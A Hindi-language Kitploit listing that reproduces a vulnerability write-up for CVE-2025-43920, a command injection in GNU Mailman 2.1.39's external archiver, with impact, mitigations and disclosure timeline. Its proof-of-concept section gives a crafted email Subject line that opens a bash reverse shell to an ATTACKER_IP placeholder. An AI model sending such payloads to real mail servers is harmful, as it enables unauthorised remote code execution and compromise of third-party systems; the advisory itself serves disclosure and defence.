Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-43920 — CVE-2025-43920 के लिए PoC और तकनीकी राइट-अप, GNU Mailman 2.1.39 के बाहरी आर्काइवर में रिमोट कमांड इंजेक्शन जो क्राफ्टेड ईमेल विषयों के माध्यम से बिना प्रमाणीकरण के कोड निष्पादन की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/0nyx-my7h/cve-2025-43920
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलईमेल सुरक्षा
GitHub0nyx-my7h/cve-2025-43920

CVE-2025-43920

CVE-2025-43920 के लिए PoC और तकनीकी राइट-अप, GNU Mailman 2.1.39 के बाहरी आर्काइवर में रिमोट कमांड इंजेक्शन जो क्राफ्टेड ईमेल विषयों के माध्यम से बिना प्रमाणीकरण के कोड निष्पादन की अनुमति देता है।

रिपॉजिटरी देखें
1521 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-43920: GNU Mailman 2.1.39 (cPanel/WHM बंडल) में ईमेल विषय के माध्यम से कमांड इंजेक्शन

खोजकर्ता: फिरुदिन दावुदज़ादा और मुसाजादा अयदान
प्रकटीकरण तिथि: अप्रैल 2025
CVE ID: CVE-2025-43920
गंभीरता: 5.4 मध्यम (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N)
हमले का प्रकार: दूरस्थ
प्रभावित सॉफ्टवेयर: GNU Mailman 2.1.39 (cPanel/WHM के साथ बंडल)

अवलोकन

GNU Mailman 2.1.39, जो cPanel और WHM के साथ बंडल किया गया है, एक गंभीर कमांड इंजेक्शन दोष के प्रति संवेदनशील है जो अप्रमाणित हमलावरों को मनमानी ऑपरेटिंग सिस्टम कमांड निष्पादित करने की अनुमति देता है। यह भेद्यता तब उत्पन्न होती है जब mm_cfg.py कॉन्फ़िगरेशन फ़ाइल में PUBLIC_EXTERNAL_ARCHIVER या PRIVATE_EXTERNAL_ARCHIVER का उपयोग करके एक बाहरी संग्रहकर्ता कॉन्फ़िगर किया जाता है, और ईमेल विषय पंक्ति में शेल मेटाकैरेक्टर होते हैं जो ठीक से स्वच्छ नहीं किए जाते हैं। इससे पूर्ण सिस्टम से समझौता हो सकता है, जिससे हमलावर रिवर्स शेल स्थापित कर सकते हैं, डेटा चुरा सकते हैं, या अन्य दुर्भावनापूर्ण कार्य कर सकते हैं।

भेद्यता विवरण

  • भेद्यता प्रकार: कमांड इंजेक्शन
  • विक्रेता: GNU Mailman (GNU Mailman)
  • प्रभावित संस्करण: Mailman 2.1.39; संभवतः पुराने 2.1.x संस्करणों को भी प्रभावित करता है (प्रतिगमन परीक्षण लंबित)
  • प्रभावित घटक:
    • बाहरी संग्रहकर्ता कॉन्फ़िगरेशन (PUBLIC_EXTERNAL_ARCHIVER, PRIVATE_EXTERNAL_ARCHIVER)
    • Mailman/Handlers/ (ईमेल विषय प्रसंस्करण तर्क, संभवतः CookHeaders.py जैसी फ़ाइलें शामिल हैं)
  • मूल कारण: जब कोई बाहरी संग्रहकर्ता कॉन्फ़िगर किया जाता है, तो ईमेल विषय पंक्ति को उचित स्वच्छता के बिना शेल कमांड में पास किया जा सकता है, जिससे शेल मेटाकैरेक्टर (जैसे ;, &, |) मौजूद होने पर मनमानी कमांड निष्पादित की जा सकती है।
  • स्थिति: कोई आधिकारिक फिक्स उपलब्ध नहीं। Mailman 2.1.x जीवन-काल समाप्त (EOL) है; Mailman 3.x में माइग्रेशन की दृढ़ता से अनुशंसा की जाती है।

प्रूफ ऑफ कॉन्सेप्ट

इस भेद्यता का शोषण करने के लिए, एक हमलावर Mailman-प्रबंधित सूची में एक दुर्भावनापूर्ण विषय पंक्ति के साथ एक ईमेल भेज सकता है, जैसे:

root@kitploit:~
Subject: ;bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

पूर्वापेक्षाएँ:

  • लक्षित Mailman सूची में PUBLIC_EXTERNAL_ARCHIVER या PRIVATE_EXTERNAL_ARCHIVER के माध्यम से कॉन्फ़िगर किया गया एक बाहरी संग्रहकर्ता होना चाहिए।
  • हमलावर के पास लक्ष्य सूची में भेजने में सक्षम एक मेल सर्वर या क्लाइंट का नियंत्रण होना चाहिए।
  • रिवर्स शेल प्राप्त करने के लिए ATTACKERIP:4444 पर एक लिसनर (जैसे, netcat) स्थापित किया जाना चाहिए।

अपेक्षित परिणाम: यदि बाहरी संग्रहकर्ता कमांड विषय पंक्ति को स्वच्छ नहीं करता है, तो दुर्भावनापूर्ण कमांड सर्वर पर निष्पादित होता है, हमलावर के सर्वर पर एक रिवर्स शेल स्थापित करता है।

हमले के वेक्टर

  • प्राथमिक वेक्टर: बाहरी संग्रहकर्ता के साथ कॉन्फ़िगर की गई Mailman-प्रबंधित मेलिंग सूची में शेल मेटाकैरेक्टर युक्त दुर्भावनापूर्ण ईमेल विषय पंक्तियाँ।
  • शोषण परिदृश्य:
    • लगातार पहुंच के लिए रिवर्स शेल स्थापित करना।
    • डेटा चुराने, कॉन्फ़िगरेशन बदलने या मैलवेयर स्थापित करने के लिए कमांड निष्पादित करना।
    • हमलों को बढ़ाने के लिए अन्य भेद्यताओं के साथ श्रृंखलाबद्ध करना।
  • शोषण में आसानी: उच्च, क्योंकि कोई भी ईमेल प्रेषक बाहरी संग्रहकर्ता सेटअप वाली सार्वजनिक या गलत कॉन्फ़िगर की गई सूचियों को लक्षित कर सकता है।

सुरक्षा प्रभाव

  • कोड निष्पादन: उच्च (मनमानी OS कमांड निष्पादन)।
  • विशेषाधिकार वृद्धि: उच्च (Mailman के रनटाइम विशेषाधिकारों के आधार पर संभावित रूट पहुंच)।
  • सूचना प्रकटीकरण: उच्च (कमांड आउटपुट सिस्टम डेटा प्रकट कर सकता है)।
  • सेवा-से-इनकार: उच्च (दुर्भावनापूर्ण कमांड सर्वर को क्रैश या ओवरलोड कर सकते हैं)।

शमन

तत्काल कार्रवाई

  • बाहरी संग्रहकर्ता अक्षम करें: बाहरी संग्रहकर्ता कार्यक्षमता को अक्षम करने के लिए mm_cfg.py में PUBLIC_EXTERNAL_ARCHIVER और PRIVATE_EXTERNAL_ARCHIVER को None पर सेट करें:

    root@kitploit:~
    PUBLIC_EXTERNAL_ARCHIVER = None
    PRIVATE_EXTERNAL_ARCHIVER = None
    
  • इनपुट स्वच्छ करें: यदि बाहरी संग्रहकर्ता की आवश्यकता है, तो सुनिश्चित करें कि कमांड शेल मेटाकैरेक्टर इंजेक्शन को रोकने के लिए विषय पंक्ति को स्वच्छ करता है।

  • सदस्यता प्रतिबंधित करें: जोखिम कम करने के लिए मेलिंग सूची सदस्यता को विश्वसनीय उपयोगकर्ताओं तक सीमित करें।

दीर्घकालिक समाधान

  • Mailman 3.x में अपग्रेड करें: Mailman 3.x में माइग्रेट करें, जो मजबूत इनपुट स्वच्छता लागू करता है और सक्रिय रूप से बनाए रखा जाता है।
  • ईमेल प्रसंस्करण अक्षम करें: यदि आवश्यक न हो, तो हमले के वेक्टर को खत्म करने के लिए Mailman की ईमेल प्रसंस्करण कार्यक्षमता को अक्षम करें।
  • पर्यावरण को कठोर बनाएं: संभावित शोषण के प्रभाव को सीमित करने के लिए Mailman को न्यूनतम विशेषाधिकारों वाले कंटेनरीकृत वातावरण में चलाएं।

समयरेखा

  • Q1 2025: अधिकृत पैठ परीक्षण मूल्यांकन के दौरान खोजा गया।
  • Q1 2025: GNU Mailman और cPanel अनुरक्षकों को रिपोर्ट किया गया।
  • अप्रैल 2025: MITRE द्वारा CVE निर्दिष्ट किया गया।
  • अप्रैल 2025: इस रिपॉजिटरी के माध्यम से सार्वजनिक प्रकटीकरण।

संदर्भ

  • Mailman 2.1 स्रोत कोड
  • CVE-2025-43920 रिकॉर्ड
  • Mailman सुरक्षा अनुशंसाएँ
  • INCIBE-CERT - CVE-2025-43920
  • VULDB - CVE-2025-43920
  • राष्ट्रीय मानक और प्रौद्योगिकी संस्थान (NIST) - CVE-2025-43920
  • Tenable - CVE-2025-43920

स्वीकारोक्ति

फिरुदिन दावुदज़ादा और मुसाजादा अयदान ने एक स्वीकृत पैठ परीक्षण अभियान के दौरान जिम्मेदारी से इस भेद्यता का खुलासा किया। समन्वय के लिए MITRE CVE टीम का धन्यवाद।

संपर्क

ईमेल: [email protected]\

टूल डाउनलोड करें